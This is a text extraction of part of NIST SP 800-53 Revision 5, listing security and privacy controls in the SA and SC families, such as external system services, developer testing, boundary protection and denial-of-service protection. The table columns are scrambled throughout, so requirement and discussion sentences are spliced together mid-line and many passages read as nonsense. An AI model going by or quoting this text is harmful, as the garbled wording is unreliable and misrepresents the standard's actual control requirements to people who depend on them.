SA-9(4) External System Services | Consistent Interests of Consumers and Providers Take the following actions to verify that the interests of [Assignment: organization-defined external As organizations increasingly use external service providers, it is possible that the interests of the None.
SA-9(5) External System Services | Processing, Storage, and Service Location service
Restrictproviders]
the location areofconsistent
[Selectionwith (oneand reflectinformation
or more): organizational interests:information
processing; [Assignment: or data; syst service providers
The location may diverge
of information from organizational
processing, informationinterests.and dataInstorage,
such situations,
or systemsimply serviceshavingcan the
have a dir
SA-5, SR-4.
organization-defined actions]. required technical, management, or operational controls in place may not be sufficient if the
SA-9(6) External System Services | Organization-controlled Cryptographic Keys Maintain exclusive control of cryptographic keys for encrypted material stored or transmitted throug providers Maintaining that exclusive
implement control andof cryptographic
manage keys in are
those controls an external
not operatingsysteminprevents
a mannerdecryption
consistentofwith orgaSC-12, SC-13, SI-4.
SA-9(7) External System Services | Organization-controlled Integrity Checking Provide the capability to check the integrity of information while it resides in the external system. Storage of organizational information in an external system could limit visibility into the security status SI-7.
SA-9(8) External System Services | Processing and Storage Location — U.S. Jurisdiction Restrict the geographic location of information processing and data storage to facilities located withinThe geographic location of information processing and data storage can have a direct impact on the ab SA-5, SR-4.
SA-10 Developer Configuration Management Require the developer of the system, system component, or system service to: Organizations consider the quality and completeness of configuration management activities CM-2, CM-3, CM-4, CM-7, CM-9, SA-4, SA-5, SA-8, SA-15, SI-2, SR-3, SR-4, SR-5, SR-6.
SA-10(1) Developer Configuration Management | Software and Firmware Integrity Verification a. Perform
Require theconfiguration
developer of management
the system, system duringcomponent,
system, component,
or systemorservice
serviceto[Selection (one orverif conducted
enable integrity Software and by firmware
developers as direct
integrity evidence allows
verification of applying effective to
organizations security
detectcontrols.
unauthorized Controls include SI-7, SR-11.
changes
more): design; development; implementation; operation; disposal]; protecting the master copies of material used to generate security-relevant portions of the system
SA-10(2) Developer Configuration Management | Alternative Configuration Management Processes Provide an alternate configuration management process using organizational personnel in the Alternate configuration
hardware, software, andmanagement firmware from processes
unauthorized may be required when
modification organizations
or destruction. use
Maintaining the None.
SA-10(3) Developer Configuration Management | Hardware Integrity Verification absence
Require the of adeveloper
dedicatedofdeveloper
the system, configuration management
system component, team.service to enable integrity verif commercial
or system Hardware integrityoff-the-shelf information
verification allows technology
organizations products.
to detect Alternate
unauthorized configuration
changesmanagement
to hardware c SI-7.
processes include organizational personnel who review and approve proposed changes to systems,
SA-10(4) Developer Configuration Management | Trusted Generation Require the developer of the system, system component, or system service to employ tools for The trusted
system generation
components, andofsystem
descriptions,
services source code, and
and conduct objectand
security code addresses
privacy impact authorized
analyseschangesprior to None.
SA-10(5) Developer Configuration Management | Mapping Integrity for Version Control comparing newly generated versions of security-relevant hardware
Require the developer of the system, system component, or system service to maintain the descriptions, source code, and to hardware, software, and firmware components
Mapping integrity for version control addresses changes to hardware, software, between versions during development.
and firmware The focus None.
object code
integritythe with
of the previous
mapping versions. is on the efficacy of the configuration management process by the developer to ensure that newly
SA-10(6) Developer Configuration Management | Trusted Distribution Require developer ofbetween
the system, the system
master component,
build data describing
or systemthe current
service version of
to execute security- The
procedures components
trusted
generated versions
during bothofinitial
distribution developmenthardware,
security-relevant
of security-relevant hardware
and system development
software,
descriptions, and life cycleupdates
firmware
source code,
updates.
and object code toand None.
help
relevant
for ensuring hardware, software, and firmware
that security-relevant hardware, and the on-site
software, master copy of the distributed
data for thetocurrent
thein Maintaining the updates
integrity between the master copies ofthe
security-relevant hardware, software,
SA-10(7) Developer Configuration Management | Security and Privacy Representatives Require
version. [Assignment: organization-defined security andand firmware
privacy updates
representatives] to be included ensure that the
Information
firmware security andare correct
privacy representations
representatives canof include master copies
code)system security maintained
officers, by the agency
datasenior None.
organization
the [Assignment:are exactly as specified byconfiguration
organization-defined the master copies.
change management and control process]. developer(including
information and have designs,
security not beenhardware
officers, tampered
senior
drawings,
agencywithofficials
during source
distribution.
for privacy,
and the
and
equivalent
system privacy
in master
officers.
SA-11 Developer Testing and Evaluation Require the developer of the system, system component, or system service, at all post-design Developmental testing and evaluation confirms that the required controls are implemented CA-2, CA-7, CM-4, SA-3, SA-4, SA-5, SA-8, SA-15, SA-17, SI-2, SR-5, SR-6, SR-7.
stages ofthe thedeveloper
system development lifesystem
cycle, to: Representation
correctly, operating by personnel
as intended, withenforcing
information security
the methodology and privacy
desired security expertise is important because
SA-11(1) Developer Testing and Evaluation | Static Code Analysis Require of the system, component, or system service to employ static code changes Static code
to analysisconfigurations
system provides a technology
can have and
unintended side forand
effects,
privacy
security
some
policies,
reviews
of which and and
may
meeting
includes
be security- None.
analysis toolsdeveloper
to identify established security and privacy requirements. Security properties ofof systems and the privacy of
SA-11(2) Developer Testing and Evaluation | Threat Modeling and Vulnerability Analyses Require the ofcommon
the system, flaws and document
system component, theorresults
system ofservice
the analysis.
to perform threat checking
Systems, for
individuals system weaknesses
may be components, in the code
affected by and the
as well
system as for
services
interconnection
the
may incorporation
deviate
of system significantly
components
libraries
orfrom orthe
changes
other included
functional
toanalysis
those can and dPM-15, RA-3, RA-5.
modeling code with known vulnerabilities or that are out-of-date and not supported. Static code
SA-11(3) Developer Testing and Evaluation | Independent Verification of Assessment Plans and Evidence (a) Requireand an vulnerability
independentanalyses during development
agent satisfying [Assignment:and the subsequent testing
organization-defined and evaluation Independent agents have the qualifications—including the expertise, skills, training, certifications, AT-3, RA-5.
independence be used to identify vulnerabilities and enforce secure coding practices. It is most effective when
of the system,
criteria] component,
to verify the correct or service that: of the developer security and privacy assessment
SA-11(4) Developer Testing and Evaluation | Manual Code Reviews Require the developer of theimplementation
system, system component, or system service to perform a manual Manual code reviews are usually reserved for the critical software and firmware components of None.
plans review
code and theofevidence produced during testing and
[Assignment: evaluation; and
SA-11(5) Developer Testing and Evaluation | Penetration Testing Require the developer of the organization-defined
system, system component, specific code]
or using
system the following
service to performprocesses,
penetration systems.
Penetration Manualtesting code
is anreviews
assessment are effective at identifying
methodology in which weaknesses
assessors, that usingrequire knowledge
all available of
information CA-8, PM-14, PM-25, PT-2, SA-3, SI-2, SI-6.
procedures,
testing: and/or techniques: [Assignment: organization-defined processes, procedures, and/or the application’s requirements or context that, in most cases, is unavailable to automated analytic
SA-11(6) Developer Testing and Evaluation | Attack Surface Reviews Require the developer of the system, system component, or system service to perform attack surfaceAttack
techniques]. tools andsurfaces
techniques,of systemssuch and system
as static andcomponents
dynamic analysis. are exposed areas that
The benefits make those
of manual systems moreSA-15.
code review vul
SA-11(7) Developer Testing and Evaluation | Verify Scope of Testing and Evaluation Require the developer of the system, system component, or system service to verify that the scope ofVerifying that testing and evaluation provides complete coverage of required controls can be accomplSA-15.
SA-11(8) Developer Testing and Evaluation | Dynamic Code Analysis Require the developer of the system, system component, or system service to employ dynamic Dynamic code analysis provides runtime verification of software programs using tools capable of None.
SA-11(9) Developer Testing and Evaluation | Interactive Application Security Testing code analysis
Require tools to identify
the developer common
of the system, flaws component,
system and document or the results
system of the
service to analysis. monitoring (also
employ interactive Interactive programs known forasmemory corruption, user privilege
instrumentation-based) application issues, and testing
security other potential
is a method security
of None.
application problems.vulnerabilities
Dynamic codeby analysis employs runtimeas tools
theytorunensure that security Thefunctionality
SA-12(2) Supply Chain Protection | Supplier Reviews [Withdrawn:security
Movedtesting
to SR-6.] tools to identify flaws and document the results. detecting
performs in the way it was
observing
designed.
applications
A type of dynamic analysis,
during
known
testing. use of
as fuzz testing, induces
instrumentation relies on direct measurements of the actual running applications and uses access
SA-12(3) Supply Chain Protection | Trusted Shipping and Warehousing [Withdrawn: Incorporated into SR-3.] to the code, user interaction, libraries, frameworks, backend connections, and configurations to
SA-12(4) Supply Chain Protection | Diversity of Suppliers [Withdrawn: Moved to SR-3(1).]
SA-12(5) Supply Chain Protection | Limitation of Harm [Withdrawn: Moved to SR-3(2).]
SA-12(6) Supply Chain Protection | Minimizing Procurement Time [Withdrawn: Incorporated into SR-5(1).]
SA-12(7) Supply Chain Protection | Assessments Prior to Selection / Acceptance / Update [Withdrawn: Moved to SR-5(2).]
SA-12(8) Supply Chain Protection | Use of All-source Intelligence [Withdrawn: Incorporated into RA-3(2).]
SA-12(9) Supply Chain Protection | Operations Security [Withdrawn: Moved to SR-7.]
SA-13 Trustworthiness [Withdrawn: Incorporated into SA-8.]
SA-14 Criticality Analysis [Withdrawn: Incorporated into RA-9.]
SA-14(1) Criticality Analysis | Critical Components with No Viable Alternative Sourcing [Withdrawn: Incorporated into SA-20.]
SA-15(4) Development Process, Standards, and Tools | Threat Modeling and Vulnerability Analysis [Withdrawn: Incorporated into SA-11(2).]
SA-15(9) Development Process, Standards, and Tools | Use of Live Data [Withdrawn: Incorporated into SA-3(2).]
SA-18 Tamper Resistance and Detection [Withdrawn: Moved to SR-9.]
SA-18(1) Tamper Resistance and Detection | Multiple Phases of System Development Life Cycle [Withdrawn: Moved to SR-9(1).]
SA-18(2) Tamper Resistance and Detection | Inspection of Systems or Components [Withdrawn: Moved to SR-10.]
SA-19 Component Authenticity [Withdrawn: Moved to SR-11.]
SA-19(1) Component Authenticity | Anti-counterfeit Training [Withdrawn: Moved to SR-11(1).]
SA-19(2) Component Authenticity | Configuration Control for Component Service and Repair [Withdrawn: Moved to SR-11(2).]
SA-15 Development Process, Standards, and Tools a. Require the developer of the system, system component, or system service to follow a Development tools include programming languages and computer-aided design systems. Reviews of devel MA-6, SA-3, SA-4, SA-8, SA-10, SA-11, SR-3, SR-4, SR-5, SR-6, SR-9.
SA-15(1) Development Process, Standards, and Tools | Quality Metrics documented development
Require the developer of theprocess
system, that:
system component, or system service to: Organizations use quality metrics to establish acceptable levels of system quality. Metrics can None.
SA-15(2) Development Process, Standards, and Tools | Security and Privacy Tracking Tools (a) Define quality metrics at the beginning of the development process; and
Require the developer of the system, system component, or system service to select and employ secur include quality gates, which are collections of completion criteria or
System development teams select and deploy security and privacy tracking tools, including vulnerabiliSA-11. sufficiency standards that
represent the satisfactory execution of specific phases of the system development project. For
SA-15(3) Development Process, Standards, and Tools | Criticality Analysis Require the developer of the system, system component, or system service to perform a criticality example, Criticality aanalysis
qualityperformed
gate may require by the developer
the elimination provides of allinput to thewarnings
compiler criticalityoranalysis performed b RA-9.
a determination
SA-19(3) Component Authenticity | Component Disposal analysis:
[Withdrawn: Moved to SR-12.]
SA-15(5) Development Process, Standards, and Tools | Attack Surface Reduction Require the developer of the system, system component, or system service to reduce attack surfaces Attack surface reduction is closely aligned with threat and vulnerability analyses and system architec AC-6, CM-7, RA-3, SA-11.
SA-15(6) Development Process, Standards, and Tools | Continuous Improvement Require the developer of the system, system component, or system service to implement an Developers of systems, system components, and system services consider the effectiveness and None.
SA-15(7) Development Process, Standards, and Tools | Automated Vulnerability Analysis explicit
Requireprocess to continuously
the developer improve
of the system, the development
system component, or process.
system service [Assignment: efficiency
Automated oftools
theircan development
be more effective processes for meeting
at analyzing quality objectives
exploitable weaknesses andoraddressing
deficiencies theinsecurity
large anRA-5, SA-11.
SA-15(8) Development Process, Standards, and Tools | Reuse of Threat and Vulnerability Information organization-defined
Require the developerfrequency]
of the system,to: system component, or system service to use threat modeling and privacy capabilities in current threat environments.
Analysis of vulnerabilities found in similar software applications can inform potential design and None.
SA-19(4) Component Authenticity | Anti-counterfeit Scanning and vulnerability
[Withdrawn: Movedanalyses from similar systems, components, or services to inform the current
to SR-11(3).] implementation issues for systems under development. Similar systems or system components may
development process. exist within developer organizations. Vulnerability information is available from a variety of public
SA-15(10) Development Process, Standards, and Tools | Incident Response Plan Require the developer of the system, system component, or system service to provide, implement, and The incident response plan provided by developers
and private sector sources, including the NIST National Vulnerability Database. may provide information not readily available to o
IR-8.
SA-15(11) Development Process, Standards, and Tools | Archive System or Component Require the developer of the system or system component to archive the system or component to beArchiving re system or system components requires the developer to retain key development artifacts, CM-2.
SA-15(12) Development Process, Standards, and Tools | Minimize Personally Identifiable Information Require the developer of the system or system component to minimize the use of personally identifi Organizations can minimize the risk to an individual’s privacy by using techniques such as de-identifi PM-25, SA-3, SA-8.
SA-16 Developer-provided Training Require the developer of the system, system component, or system service to provide the following tDeveloper-provided training applies to external and internal (in-house) developers. Training personneAT-2, AT-3, PE-3, SA-4, SA-5.
SA-17 Developer Security and Privacy Architecture and Design Require the developer of the system, system component, or system service to produce a design Developer security and privacy architecture and design are directed at external developers, although PL-2, PL-8, PM-7, SA-3, SA-4, SA-8, SC-7.
SA-17(1) Developer Security and Privacy Architecture and Design | Formal Policy Model specification and security
Require the developer andsystem,
of the privacy system
architecture that: or system service to:
component, Formal models describe specific behaviors or security and privacy policies using formal languages, th AC-3, AC-4, AC-25.
SA-17(2) Developer Security and Privacy Architecture and Design | Security-relevant Components (a) Produce,
Require as an integral
the developer part
of the of the system
system, development process,
component, or asystem
formalservice
policy to:
model describing the The security-relevant hardware, software, and firmware represent the portion of the system, component AC-25, SA-5.
[Assignment:
(a) Define organization-defined elements
security-relevant of organizational security and privacy policy] to be
SA-17(3) Developer Security and Privacy Architecture and Design | Formal Correspondence Require
enforced; the developer of thehardware,
and system, systemsoftware, and firmware;
component, and service
or system to: Correspondence is an important part of the assurance gained through modeling. It demonstrates thatAC-3, AC-4, AC-25, SA-4, SA-5.
SA-17(4) Developer Security and Privacy Architecture and Design | Informal Correspondence (a) Produce,
Require as an integral
the developer part
of the of the system
system, development process,
component, or asystem
formalservice
top-level
to: specification that Correspondence is an important part of the assurance gained through modeling. It demonstrates thatAC-3, AC-4, AC-25, SA-4, SA-5.
specifies
(a) Produce, the as
interfaces
an integralto security-relevant
part of the system hardware,
development software,
process, and firmware in terms of
SA-17(5) Developer Security and Privacy Architecture and Design | Conceptually Simple Design Require
exceptions, the error
developer of the
messages, system,
and component,
effects; to security-relevant or an informal
system descriptive
service to: top-level The principle of reduced complexity states that the system design is as simple and small as possible ( AC-25, SA-8, SC-3.
specification
(a) Design andthat specifies
structure the interfaces hardware,firmware
software,toand
usefirmware in
SA-17(6) Developer Security and Privacy Architecture and Design | Structure for Testing Require
terms ofthe developer
exceptions, ofthe
error the security-relevant
system, and
messages, system hardware, software,
component,
effects; or systemand service to structure asecurity-relev
complete, Applying the security design principles in SP 800-160-1 promotes complete, consistent, and compreheSA-5, SA-11.
conceptually simple protection mechanism with precisely defined semantics; and
SA-17(7) Developer Security and Privacy Architecture and Design | Structure for Least Privilege Require the developer of the system, system component, or system service to structure security-releva The principle of least privilege states that each component is allocated sufficient privileges to AC-5, AC-6, SA-8.
SA-17(8) Developer Security and Privacy Architecture and Design | Orchestration Design [Assignment: organization-defined critical systems or system components] with coordinated accomplish its specified
Security resources that are functions but nolocated
distributed, more (see SA-8(14)).
at different Applying
layers the principle
or in different system of least
elements, None.
SA-17(9) Developer Security and Privacy Architecture and Design | Design Diversity behavior
Use to implement
different designs forthe following capabilities:
[Assignment: [Assignment:
organization-defined organization-defined
critical systems or systemcapabilities,
components] by privilege
Design
limits the scope
or are implemented
diversity is achieved
of the different
to support by
component’s
supplying aspects
the
actions,
same
which has twocan
ofrequirements
trustworthiness desirable
interact
specification
effects.
to in First, theor
unforeseen
multiple
system oracomponent]. security impact
incorrect ways. of a failure, corruption, can or misuse ofcascading
the system component results in minimized None.
oracoverage
SA-21(1) Developer Screening | Validation of Screening to satisfy
[Withdrawn: common set of into
Incorporated requirements
SA-21.] or to provide equivalent functionality. developers, eachAdverse
of whom consequences
is responsible forinclude
developing failures,
a variant of the interference,
system or system
gaps. Coordination
component that meets of thethebehavior
requirements.of security resources
Variants can be(e.g., by ensuring
in software design, thatinone patch isdesign, or
hardware
SA-22(1) Unsupported System Components | Alternative Sources for Continued Support [Withdrawn: Incorporated into SA-22.] in both hardware and a software design. Differences in the designs of the variants can result from

10 of 2021-01-21
 NIST SP 800-53, Revision 5, Security and Privacy Controls for Information Systems and Organizations

SA-4(4) Acquisition Process | Assignment of Components to Systems [Withdrawn: Incorporated into CM-8(9).]
SA-5(1) System Documentation | Functional Properties of Security Controls [Withdrawn: Incorporated into SA-4(1).]
SA-5(2) System Documentation | Security-relevant External System Interfaces [Withdrawn: Incorporated into SA-4(2).]
SA-5(3) System Documentation | High-level Design [Withdrawn: Incorporated into SA-4(2).]
SA-5(4) System Documentation | Low-level Design [Withdrawn: Incorporated into SA-4(2).]
SA-5(5) System Documentation | Source Code [Withdrawn: Incorporated into SA-4(2).]
SA-20 Customized Development of Critical Components Reimplement or custom develop the following critical system components: [Assignment: organizationOrganizations determine that certain system components likely cannot be trusted due to specific threats CP-2,toRA-9,
and vulnerabilities
SA-8. in those components for which there are no viable security controls to adequate
SA-21 Developer Screening Require that the developer of [Assignment: organization-defined system, system component, or Developer screening is directed at external developers. Internal developer screening is addressed by PS-2, PS-3, PS-6, PS-7, SA-4, SR-6.
SA-6 Software Usage Restrictions system service]:
[Withdrawn: Incorporated into CM-10 and SI-7.]
SA-22 Unsupported System Components a. Replace system components when support for the components is no longer available from the Support for system components includes software patches, firmware updates, replacement parts, PL-2, SA-3.
SA-7 User-installed Software developer,
[Withdrawn: vendor, or manufacturer;
Incorporated into CM-11orand SI-7.] and maintenance contracts. An example of unsupported components includes when vendors no
longer provide critical software patches or product updates, which can result in an opportunity for
SA-23 Specialization Employ [Selection (one or more): design; modification; augmentation; reconfiguration] on [AssignmeIt is often necessary
adversaries to exploitforweaknesses
a system orinsystem component
the installed that supports
components. mission-essential
Exceptions to replacing services or f RA-9, SA-8.
SC-1 Policy and Procedures a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: System and communications protection policy and procedures address the controls in the SC family that PM-9, PS-8, SA-8, SI-12.
SC-2 Separation of System and User Functionality 1. [Selection (one or more): Organization-level; Mission/business process-level; System-level]
Separate user functionality, including user interface services, from system management functionalitySystem management functionality includes functions that are necessary to administer databases, netwo AC-6, SA-4, SA-8, SC-3, SC-7, SC-22, SC-32, SC-39.
system and communications protection policy that:
SC-2(1) Separation of System and User Functionality | Interfaces for Non-privileged Users Prevent the presentation of system management functionality at interfaces to non-privileged users. Preventing the presentation of system management functionality at interfaces to non-privileged usersAC-3. e
SC-2(2) Separation of System and User Functionality | Disassociability Store state information from applications and software separately. If a system is compromised, storing applications and software separately from state information None.
SC-3 Security Function Isolation Isolate security functions from nonsecurity functions. about
Security users’ interactions
functions with an
are isolated application
from nonsecurity mayfunctions
better protect
by meansindividuals’ privacy.boundary implemen
of an isolation AC-3, AC-6, AC-25, CM-2, CM-4, SA-4, SA-5, SA-8, SA-15, SA-17, SC-2, SC-7, SC-32, SC-39,
SC-3(1) Security Function Isolation | Hardware Separation Employ hardware separation mechanisms to implement security function isolation. Hardware separation mechanisms include hardware ring architectures that are implemented within SI-16. None.
SC-3(2) Security Function Isolation | Access and Flow Control Functions Isolate security functions enforcing access and information flow control from nonsecurity functions Security microprocessors
functionand hardware-enforced
isolation occurs becauseaddress segmentationThe
of implementation. used to support
functions can logically distinct
still be scanned None.
and from other security functions. storage
and objects with
monitored. separate
Security attributes
functions that (i.e.,
are readable,isolated
potentially writeable).
from access and flow control
SC-3(3) Security Function Isolation | Minimize Nonsecurity Functionality Minimize the number of nonsecurity functions included within the isolation boundary containing Where it is not feasible to achieve strict isolation of nonsecurity functions from security functions, it None.
security functions. enforcement
is necessary tofunctions
take include
actions auditing, nonsecurity-relevant
to minimize intrusion detection, and malicious code protection
SC-3(4) Security Function Isolation | Module Coupling and Cohesiveness Implement security functions as largely independent modules that maximize internal cohesiveness functions. The reduction of inter-module interactions helps to constrain functions within
security functions the security
and manage function None.
within modules and functions
minimize ascoupling between modules. boundary. Nonsecurity functions contained within theareisolation boundary are considered security-
SC-3(5) Security Function Isolation | Layered Structures Implement security a layered structure minimizing interactions between layers of the complexity.
relevant
The concepts
The implementation
because
of coupling
of layered
errors orrefers
and cohesion
structures
malicious code with
in theminimized
software
important with among
interactions
can
respect to modularity
security functionsin
functions None.
design software design. layers
Coupling to the dependencies onedirectly
thatdepend module impact
has onthe security
other modules.
SC-4 Information in Shared System Resources Preventand avoiding any
unauthorized anddependence
unintendedbyinformation
lower layers on the via
transfer functionality or correctness
shared system resources.of higher and non-looping
Preventing
Cohesion unauthorized
refers
(i.e.,
andlower-layer
unintended
to the relationship between
functions
informationdo not
functions transfer
within a via
on higher-layer
shared
module. system
Best
functions)
resources
practices
enables
stops
in software informa
AC-3, AC-4, SA-8.
layers. the isolation of security functions and the management of complexity.
SC-12(4) Cryptographic Key Establishment and Management | PKI Certificates [Withdrawn: Incorporated into SC-12(3).]
SC-4(2) Information in Shared System Resources | Multilevel or Periods Processing Prevent unauthorized information transfer via shared resources in accordance with [Assignment: Changes in processing levels can occur during multilevel or periods processing with information at None.
SC-5 Denial-of-service Protection organization-defined
a. procedures]
[Selection: Protect against; when
Limit] systemof
the effects processing explicitly
the following typesswitches between different
of denial-of-service events: different classification
Denial-of-service events levels
mayor security
occur due to categories.
a variety Itofcan also occur
internal during serial
and external causes,reuse
suchofashardware
an attack CP-2, IR-4, SC-6, SC-7, SC-40.
information classification
[Assignment: levels or security
organization-defined categories. components at different classification levels. Organization-defined procedures can include
SC-5(1) Denial-of-service Protection | Restrict Ability to Attack Other Systems Restrict the ability of individuals to types
launchofthe
denial-of-service events]; and attacks against other
following denial-of-service Restrictingsanitization
approved the ability of individuals
processes for to launch denial-of-service
electronically attacks requires the mechanisms
stored information. None.
SC-5(2) Denial-of-service Protection | Capacity, Bandwidth, and Redundancy systems: [Assignment: organization-defined denial-of-service attacks].
Manage capacity, bandwidth, or other redundancy to limit the effects of information flooding commonly used for such attacks to be unavailable. Individuals of concern
Managing capacity ensures that sufficient capacity is available to counter flooding attacks. include hostile insiders or None.
SC-5(3) Denial-of-service Protection | Detection and Monitoring denial-of-service
(a) attacks.monitoring tools to detect indicators of denial-of-service attacks against, external
Employ the following Managing adversaries
Organizations capacity
consider
who have
includes
the
breachedselected
establishing
utilization and
or compromised
capacityusage
of system
the system
priorities,
resources
and are
quotas,when
using it toorlaunch
partitioning,
managing load
risk
a
associatedCA-7, SI-4.
denial-of-service
balancing. attack. Organizations can restrict the ability of individuals to connect and transmit
SC-6 Resource Availability or launched
Protect from, the system:
the availability [Assignment:
of resources organization-defined
by allocating monitoring tools]; resources]
[Assignment: organization-defined and by [S Priority protection prevents lower-priority processes from delaying or interfering with the system t SC-5.
SC-7 Boundary Protection a. Monitor and control communications at the external managed interfaces to the system and at Managed interfaces include gateways, routers, firewalls, guards, network-based malicious code analys AC-4, AC-17, AC-18, AC-19, AC-20, AU-13, CA-3, CM-2, CM-4, CM-7, CM-10, CP-8, CP-10,
SC-12(5) Cryptographic Key Establishment and Management | PKI Certificates / Hardware Tokens key internal managed
[Withdrawn: interfaces
Incorporated within the system;
into SC-12(3).] IR-4, MA-4, PE-3, PL-8, PM-12, SA-8, SA-17, SC-5, SC-26, SC-32, SC-35, SC-43.
SC-13(1) Cryptographic Protection | FIPS-validated Cryptography [Withdrawn: Incorporated into SC-13.]
SC-7(3) Boundary Protection | Access Points Limit the number of external network connections to the system. Limiting the number of external network connections facilitates monitoring of inbound and None.
SC-7(4) Boundary Protection | External Telecommunications Services (a) Implement a managed interface for each external telecommunication service; outbound communications traffic.
External telecommunications Thecan
services Trusted Internet
provide Connection
data and/or voiceDHS TIC initiative is
communications an example
services. ExampAC-3, SC-8, SC-20, SC-21, SC-22.
(b) Establish a traffic flow policy traffic
for each of a federal guideline that requires limits on the number of external network connections. Limiting
SC-7(5) Boundary Protection | Deny by Default — Allow by Exception Deny network communications by managed interface;
default and allow network communications traffic by Denying
the number of external network connections to the system is important during transition periods None.
by default and allowing by exception applies to inbound and outbound network
SC-13(2) Cryptographic Protection | NSA-approved Cryptography exception
[Withdrawn: [Selection (one orinto
Incorporated more): at managed interfaces; for [Assignment: organization-defined communications traffic. A deny-all, permit-by-exception network communications traffic policy
SC-13.]
systems]]. ensures that only those system connections that are essential and approved are allowed. Deny by
SC-7(7) Boundary Protection | Split Tunneling for Remote Devices Prevent split tunneling for remote devices connecting to organizational systems unless the split Split tunneling
default, allow byis the processalso
exception of allowing
applies toa aremote
systemuser
thatorisdevice to establish
connected a non-remote
to an external system. None.
SC-7(8) Boundary Protection | Route Traffic to Authenticated Proxy Servers tunnel is securely provisioned
Route [Assignment: using [Assignment:
organization-defined internal organization-defined safeguards].
communications traffic] to [Assignment: organizat connection with a system
External networks and simultaneously
are networks communicate
outside of organizational via some
control. otherserver
A proxy connection to a (i.e., s AC-3.
is a server
resource in an external network. This method of network access enables a user to access remote
SC-7(9) Boundary Protection | Restrict Threatening Outgoing Communications Traffic (a) Detect and deny outgoing communications traffic posing a threat to external systems; and Detecting
devices outgoing
and communications
simultaneously, traffic from internal
access uncontrolled networks. actions that may pose
Split tunneling mightthreats to external
be desirable by syst
AU-2, AU-6, SC-5, SC-38, SC-44, SI-3, SI-4.
SC-7(10) Boundary Protection | Prevent Exfiltration (b) Prevent
(a) Audit thethe
identity of internal
exfiltration users associated
of information; and with denied communications. Prevention of exfiltration applies to both the intentional and unintentional exfiltration of informa AC-2, CA-8, SI-3.
SC-7(11) Boundary Protection | Restrict Incoming Communications Traffic (b) Conduct
Only exfiltration
allow incoming tests [Assignment:
communications fromorganization-defined frequency]. authorized sources] toGeneral source address validation techniques are applied to restrict the use of illegal and unallocat AC-3.
[Assignment: organization-defined
SC-7(12) Boundary Protection | Host-based Protection Implement [Assignment: organization-defined host-based boundary protection mechanisms] at Host-based boundary protection mechanisms include host-based firewalls. System components None.
SC-7(13) Boundary Protection | Isolation of Security Tools, Mechanisms, and Support Components [Assignment: organization-defined
Isolate [Assignment: system information
organization-defined components].
security tools, mechanisms, and support co that employ
Physically host-based
separate boundarywith
subnetworks protection
managed mechanisms
interfaces are include
usefulservers, workstations,
in isolating computernotebook
network deSC-2, SC-3.
computers, and mobile devices.
SC-7(14) Boundary Protection | Protect Against Unauthorized Physical Connections Protect against unauthorized physical connections at [Assignment: organization-defined managed intSystems that operate at different security categories or classification levels may share common physiPE-4, PE-19.
SC-7(15) Boundary Protection | Networked Privileged Accesses Route networked, privileged accesses through a dedicated, managed interface for purposes of accessPrivileged access provides greater accessibility to system functions, including security functions. Ad AC-2, AC-3, AU-2, SI-4.
SC-7(16) Boundary Protection | Prevent Discovery of System Components Prevent the discovery of specific system components that represent a managed interface. Preventing the discovery of system components representing a managed interface helps protect None.
SC-7(17) Boundary Protection | Automated Enforcement of Protocol Formats Enforce adherence to protocol formats. network addresses ofthat
System components those components
enforce protocolfrom discovery
formats include through common
deep packet tools and
inspection techniques
firewalls and XML SC-4.
gat
used to identify devices on networks. Network addresses are not available for discovery and require
SC-7(18) Boundary Protection | Fail Secure Prevent systems from entering unsecure states in the event of an operational failure of a boundary pFail secure is a condition achieved by employing mechanisms
prior knowledge for access. Preventing the discovery of components and devices can be to ensure that in the event of operationCP-2, CP-12, SC-24.
SC-7(19) Boundary Protection | Block Communication from Non-organizationally Configured Hosts Block inbound and outbound communications traffic between [Assignment: organization-defined Communication clients independently configured by end users and external service providers None.
SC-7(20) Boundary Protection | Dynamic Isolation and Segregation communication clients] that are independently configured by end users
Provide the capability to dynamically isolate [Assignment: organization-defined system and external service include instant messaging clients and video conferencing software
The capability to dynamically isolate certain internal system components is useful when it is and applications. Traffic blocking None.
providers.
components] fromprotection
other system components. does not apply
necessary to communication
to partition or separate clients
systemthat are configured
components by organizations
of questionable origin or to perform
from components that CA-9.
SC-7(21) Boundary Protection | Isolation of System Components Employ boundary mechanisms to isolate [Assignment: organization-defined system compon Organizations
authorized can isolate
functions. system components that perform different mission business functions.
possess greater trustworthiness. Component isolation reduces the attack surface of organizational
SC-7(22) Boundary Protection | Separate Subnets for Connecting to Different Security Domains Implement separate network addresses to connect to systems in different security domains. The decomposition
systems. of systems
Isolating selected systemintocomponents
subnetworkscan (i.e., subnets)
also limit the helps to provide
damage the appropriate
from successful attacks None.
SC-7(23) Boundary Protection | Disable Sender Feedback on Protocol Validation Failure Disable feedback to senders on protocol format validation failure. level of protection
Disabling feedback for networkwhen
to senders connections
there isto different
a failure security domains
in protocol validationthat contain
format information None.
prevents
with different
adversaries fromsecurity categories
obtaining or classification
that wouldlevels.
SC-7(24) Boundary Protection | Personally Identifiable Information For systems that process personally identifiable information: Managing the processing ofinformation
personally identifiable otherwise beisunavailable.
information an important aspect of protecting aPT-2, SI-15.
SC-7(25) Boundary Protection | Unclassified National Security System Connections (a) Applythe
Prohibit thedirect
following processing
connection rules to dataorganization-defined
of [Assignment: elements of personally identifiable
unclassified information:
national security A direct connection is a dedicated physical or virtual connection between two or more systems. None.
[Assignment:
system] to organization-defined processing rules];
SC-7(26) Boundary Protection | Classified National Security System Connections Prohibit theandirect
external networkofwithout
connection the use
a classified of [Assignment:
national organization-defined
security system to an external networkboundary Organizations
A direct connection typicallyis ado not havephysical
dedicated complete or control over external
virtual connection networks,
between twoincluding the Internet. None.
or more systems.
protection
without thedevice].
use of [Assignment: organization-defined boundary protection device]. Boundary protection
Organizations typically devices
not(e.g., firewalls, gateways,over andexternal
routers)networks,
mediate communications and
SC-7(27) Boundary Protection | Unclassified Non-national Security System Connections Prohibit the direct connection of [Assignment: organization-defined unclassified non-national A direct connection
information flows is ado
between dedicatedhavephysical
unclassified
complete or control
nationalvirtual connection
security systems between
and twoincluding
external or the Internet.
more systems.
networks. None.
security Boundary protection devices
not(e.g., firewalls, gateways,over andexternal
routers)networks,
mediate communications and
SC-7(28) Boundary Protection | Connections to Public Networks Prohibit system]
the direct toconnection
an externalofnetwork without
[Assignment: the use of [Assignment:
organization-defined organization-defined
system] to a public network. Organizations
A direct connection
information
typicallyis ado
flows between dedicatedhavephysical
complete or control
virtual connection between two including
or more In the Internet.
systems. A None.
boundary protection device]. Boundary protection
public network devicesclassified
is asystem
network accessible
national
(e.g., firewalls,
to the
security
gateways, systems
and routers)
public, including
and external
mediateand
